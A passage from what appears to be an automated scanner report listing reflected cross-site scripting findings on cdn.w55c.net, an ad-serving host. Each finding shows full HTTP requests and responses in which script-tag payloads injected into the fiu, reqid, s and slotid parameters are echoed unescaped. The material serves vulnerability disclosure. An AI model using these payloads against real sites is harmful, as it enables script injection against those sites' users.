GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=48222"><script>alert(1)</script>582d0f188f5&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:10 GMT
Cache-Control: no-cache, no-store
pragma: no-cache
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 426
Via: 1.1 mdw061007 (MII-APC/1.6)
Content-Length: 2232

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=48222"><script>alert(1)</script>582d0f188f5&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgw
...[SNIP]...

6.92. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [fiu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the fiu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4de1"><script>alert(1)</script>21a09d385e5 was submitted in the fiu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVAd4de1"><script>alert(1)</script>21a09d385e5&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:10 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 426
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061006 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
NETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVAd4de1"><script>alert(1)</script>21a09d385e5&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgw
...[SNIP]...

6.93. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [reqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the reqid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe51"><script>alert(1)</script>ec85ea665e2 was submitted in the reqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjYbbe51"><script>alert(1)</script>ec85ea665e2&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:12 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 428
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjYbbe51"><script>alert(1)</script>ec85ea665e2&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=N
...[SNIP]...

6.94. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [reqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the reqid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77fab"><script>alert(1)</script>8367cace647 was submitted in the reqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=77fab"><script>alert(1)</script>8367cace647&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Cache-Control: no-cache, no-store
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
content-type: text/html
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:13 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 429
pragma: no-cache
Via: 1.1 mdw061007 (MII-APC/1.6)
Content-Length: 2174

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=77fab"><script>alert(1)</script>8367cace647&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=N
...[SNIP]...

6.95. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baefa"><script>alert(1)</script>c6153ed0c54 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=baefa"><script>alert(1)</script>c6153ed0c54& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:19:03 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:16 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 75
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061007 (MII-APC/1.6)
Content-Length: 2158

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=baefa"><script>alert(1)</script>c6153ed0c54&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw
...[SNIP]...

6.96. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a75f5"><script>alert(1)</script>925c4d5e97b was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.phpa75f5"><script>alert(1)</script>925c4d5e97b& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:16 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 432
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061003 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
C4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.phpa75f5"><script>alert(1)</script>925c4d5e97b&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw
...[SNIP]...

6.97. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [slotid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the slotid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abca4"><script>alert(1)</script>be9a44755d8 was submitted in the slotid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQabca4"><script>alert(1)</script>be9a44755d8&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
